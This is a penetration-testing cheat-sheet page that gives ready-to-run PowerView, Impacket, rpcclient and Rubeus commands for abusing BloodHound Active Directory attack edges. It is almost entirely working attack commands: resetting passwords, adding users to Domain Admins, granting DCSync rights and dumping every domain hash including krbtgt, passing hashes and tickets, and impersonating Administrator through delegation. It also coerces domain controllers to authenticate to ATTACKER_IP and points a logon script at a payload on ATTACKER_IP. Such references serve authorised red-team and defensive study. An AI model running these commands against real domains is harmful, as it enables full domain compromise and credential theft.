> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Attack Paths

> Exploitation commands for BloodHound attack path edges in Active Directory.

## GenericAll

Reset target user password.

```powershell theme={"dark"}
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
```

```bash theme={"dark"}
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
```

Add target user to Domain Admins.

```powershell theme={"dark"}
Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
```

```bash theme={"dark"}
net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01
```

***

## ForceChangePassword

```powershell theme={"dark"}
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
```

```bash theme={"dark"}
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
```

```bash theme={"dark"}
impacket-changepasswd 'DOMAIN/TARGET@DC01' -newpass 'NewP@ss123' -reset -altuser 'DOMAIN/ATTACKER' -altpass 'Password'
```

***

## AddMember

```powershell theme={"dark"}
Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
```

```bash theme={"dark"}
net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01
```

***

## GenericWrite

Write a SPN to Kerberoast the target.

```powershell theme={"dark"}
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='nonexistent/BLAH'}
```

```bash theme={"dark"}
# addspn.py is part of krbrelayx, not impacket
python addspn.py -u 'DOMAIN\ATTACKER' -p 'Password' -s 'nonexistent/BLAH' -t 'TARGET' DC01
```

Abuse logon script for code execution.

```powershell theme={"dark"}
Set-DomainObject -Identity TARGET -Set @{scriptpath='\\ATTACKER_IP\share\payload.ps1'}
```

***

## WriteDACL

Grant DCSync rights to controlled user.

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity ATTACKER -Rights DCSync
```

Grant full control over a target object.

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
```

***

## WriteOwner

Take ownership then grant full control.

```powershell theme={"dark"}
Set-DomainObjectOwner -Identity TARGET -OwnerIdentity ATTACKER
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
```

***

## AllExtendedRights

Reset target password.

```powershell theme={"dark"}
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
```

Add SPN for Kerberoasting.

```powershell theme={"dark"}
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='fake/spn'}
Get-DomainSPNTicket -SPN 'fake/spn' -OutputFormat Hashcat
```

***

## DCSync (GetChanges + GetChangesAll)

Dump all domain hashes.

```bash theme={"dark"}
impacket-secretsdump 'DOMAIN/USER:Password@DC01'
```

Dump only NTLM hashes.

```bash theme={"dark"}
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-ntlm
```

Dump a specific user.

```bash theme={"dark"}
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-user krbtgt
```

Pass-the-Hash variant.

```bash theme={"dark"}
impacket-secretsdump 'DOMAIN/USER@DC01' -hashes LMHASH:NTHASH -just-dc-ntlm
```

***

## Unconstrained Delegation

Monitor for incoming TGTs (run on compromised host with unconstrained delegation).

```powershell theme={"dark"}
.\Rubeus.exe monitor /interval:5 /nowrap
```

Trigger DC authentication via PrinterBug.

```bash theme={"dark"}
# printerbug.py is part of krbrelayx, not impacket
python printerbug.py 'DOMAIN/USER:Password@DC01' ATTACKER_IP
```

Trigger DC authentication via PetitPotam (unauthenticated).

```bash theme={"dark"}
# PetitPotam.py is from topotam/PetitPotam, not impacket
python PetitPotam.py ATTACKER_IP DC01
```

Extract captured TGT and pass it.

```powershell theme={"dark"}
.\Rubeus.exe ptt /ticket:<base64>
```

***

## Constrained Delegation (S4U2Proxy)

Impersonate Domain Admin to target service.

```powershell theme={"dark"}
.\Rubeus.exe s4u /user:SVC_ACCOUNT /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/DC01.domain.local /ptt
```

```bash theme={"dark"}
impacket-getST -spn 'cifs/DC01.domain.local' -impersonate Administrator 'DOMAIN/SVC_ACCOUNT' -hashes LMHASH:NTHASH
```

```bash theme={"dark"}
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass 'DOMAIN/Administrator@DC01.domain.local'
```

***

## Resource-Based Constrained Delegation (RBCD)

Add attacker-controlled computer to target's `msDS-AllowedToActOnBehalfOfOtherIdentity`.

```powershell theme={"dark"}
Set-DomainRBCD -Identity TARGET_COMPUTER -DelegateFrom ATTACKER_COMPUTER
```

```bash theme={"dark"}
impacket-rbcd -f ATTACKER_COMPUTER -t TARGET_COMPUTER -dc-ip DC01 'DOMAIN/USER:Password'
```

Impersonate Administrator.

```bash theme={"dark"}
impacket-getST -spn 'cifs/TARGET_COMPUTER.domain.local' -impersonate Administrator 'DOMAIN/ATTACKER_COMPUTER$' -hashes LMHASH:NTHASH
```

***

## References

* [BloodHound CE — Attack Path Edges](https://support.bloodhoundenterprise.io/hc/en-us/categories/9552454598043)
* [HackTricks — Abusing Active Directory ACLs](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse)
* [The Hacker Recipes — AD CS & ACL Abuse](https://www.thehacker.recipes/ad/movement/dacl)
* [Impacket — GitHub](https://github.com/fortra/impacket)
